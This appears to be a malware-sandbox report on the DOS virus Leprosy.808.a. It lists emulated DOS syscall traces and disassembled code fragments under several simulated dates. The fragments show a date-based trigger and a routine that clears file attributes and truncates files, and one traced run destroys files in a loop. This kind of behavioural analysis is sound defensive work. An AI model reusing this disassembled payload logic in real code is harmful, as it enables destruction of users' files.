Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:24.1071175Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:26:24.108874984Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:26:24.121495393Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:26:24.122990885Z 25 PC: 12b4d | Get default drive
2018-12-17T22:26:24.124518545Z 71 PC: 12b58 | Get current directory
2018-12-17T22:26:24.128611025Z 59 PC: 12b5f | Change current directory
2018-12-17T22:26:24.132902992Z 78 PC: 12b69 | Find first file
2018-12-17T22:26:24.13891685Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:26:24.142319694Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:26:24.148646387Z 59 PC: 12c60 | Change current directory
2018-12-17T22:26:24.152603238Z 59 PC: 12c67 | Change current directory
2018-12-17T22:26:24.155563632Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:26:24.157714485Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.095250233Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.097281638Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.100457426Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.101942042Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.104273218Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.113204397Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.118825628Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.129599157Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.13270663Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.139732809Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.15074088Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.154096906Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.158007311Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.179884874Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.181719411Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.184541141Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.185810768Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.18877602Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.192795568Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.197367637Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.203830878Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.205849911Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.213169801Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.218135603Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.222050425Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.224917737Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.283619036Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.285081647Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.287031179Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.287921068Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.289283567Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.29205825Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.295850483Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.306957847Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.308586792Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.313985261Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.318204534Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.319739374Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.321642794Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T11:52:40.323103137Z 78 PC: 12c8b | Find first file
2018-12-25T11:52:40.328591618Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T11:52:40.332890284Z 60 PC: 12c9b | Create or truncate file
2018-12-25T11:52:40.365565549Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.367310124Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.379785354Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.394134714Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.396754675Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.406198875Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.417907366Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.429156724Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.438618779Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.45012421Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.453988759Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.464034299Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.475794479Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.47903884Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.488759063Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.500762604Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.50393677Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.513527733Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.541849707Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.544906622Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.554584109Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.566575947Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.57086474Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.58948295Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.6015579Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.604360463Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.396219397Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.398252199Z 44 PC: 12b3e | Get time
0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.400617924Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.401562263Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.403088184Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.405832738Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.409584253Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.4154806Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.41718085Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.422734219Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.431427423Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.433449406Z 42 PC: 12c6b | Get date
0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.435601461Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')